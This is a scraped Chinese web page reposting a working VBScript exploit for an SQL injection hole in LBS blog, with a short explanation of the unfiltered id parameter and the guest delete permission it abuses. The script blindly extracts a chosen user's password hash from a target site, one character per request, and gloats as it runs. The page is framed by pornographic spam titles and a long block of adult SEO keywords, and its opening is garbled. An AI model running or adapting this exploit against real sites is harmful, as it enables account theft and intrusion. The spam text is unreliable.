'From 劍心 '============================================================================ '使用說明: ' 在命令提示符下: ' cscript.exe lbs " /> 麻豆国产人免费人成免费视频,波多野结衣久久精品免费播放,国产全黄三级三级

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

LBS blog sql注射漏洞[All version]-官方已有補丁

呵呵,只是證明下漏洞存在
exp如下,保存為vbs,自己下個程序測試自己吧

'From 劍心
'============================================================================
'使用說明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻擊的網站的博客路徑 有效的文章id 要破解的博客用戶密碼
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP對象用來打開目標網址
Dim TargetURL '目標網址
Dim userid,articleid '博客用戶名
Dim TempStr '存放已獲取的部分 MD5密碼
Dim CharHex '定義16進制字符
Dim charset

Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()


Set olbsXML = createObject("Microsoft.XMLHTTP")

'補充完整目標網址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.ASP"

articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")


WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 劍心"&vbcrlf
WScript.echo "http://www.loveshell.NET/    Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf

Call main(TargetURL,BlogName) 

Set oBokeXML = Nothing


'----------------------------------------------sub-------------------------------------------------------
'============================================
'函數名稱:main
'函數功能:主程序,注入獲得blog 用戶密碼
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
    postdata = ""
    postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"

    OpenURL = TargetURL

olbsXML.open "Post",OpenURL, False, "", ""
    olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判斷訪問的頁面是否存在
If InStr(GetPage,"deleted")<>0 Then 
'"博客用戶不存在或填寫的資料有誤" 為錯誤標志 ,返回此標志說明 猜解的 MD5 不正確
'如果得到 0000000000000000 的 MD5 值,請修改錯誤標志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf 
WScript.echo vbcrlf & GetPage& vbcrlf 
WScript.Quit
End If 
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub

'============================================
'函數名稱:BytesToBstr
'函數功能:將XMLHTTP對象中的內容轉化為GB2312編碼
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

'============================
'函數名稱:ShowUsage
'函數功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/劍心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.NET/ 1 1"
WScript.echo ""
WScript.Quit
End Sub



漏洞說明:

src_article.ASP中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......


過濾的是log_id,但是使用的確實id,呵呵 :)

然后呢?
class/article.ASP中的代碼
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}


上面不用說了吧,呵呵.不過觸發要條件的,看能滿足不哦!

function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "Javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;



默認情況下guest都有刪除權限的,盡管后面還做了判斷,但是注入已經發生,而我們正好利用他的判斷注射,呵呵

JavaScript技術LBS blog sql注射漏洞[All version]-官方已有補丁,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 亚洲激情专区 | 亚洲综合网在线 | 亚洲香蕉久久 | 日韩精品中文字幕一区三区 | 久久婷五月综合 | 91免费视频播放 | 亚洲网站视频在线观看 | 亚洲日本激情综合在线观看 | 欧美视频一 | 日本高清色惰www在线视频 | 国产成人99精品免费观看 | 一本一本久久a久久综合精品蜜桃 | 四虎影视国产精品永久在线 | 中文字幕在线有码高清视频 | 美女视频一区二区三区在线 | 亚洲欧美另类久久久精品能播放的 | 国语对白在线观看 | 国产婷婷一区二区在线观看 | 婷婷国产成人久久精品激情 | 国产精品自拍第一页 | 一区二区视频在线观看免费的 | 激情中文网 | 中文字幕在线观看一区二区三区 | 男女免费爽爽爽在线视频 | 久久亚洲精品永久网站 | 久久久网站亚洲第一 | 91免费国产在线观看 | 激情文学综合 | 91国偷自产一区二区三区 | 亚洲一区二区三区精品视频 | 尹人久久大香找蕉综合影院 | 精品久久久久久免费影院 | 美女胸又大又黄www网站 | 久草1| 国产91久久精品 | 婷婷在线观看视频 | 久久综合色区 | 亚洲成人综合网站 | 亚洲一二三区久久五月天婷婷 | 国产成人精品一区二区三在线观看 | 一二三区视频 |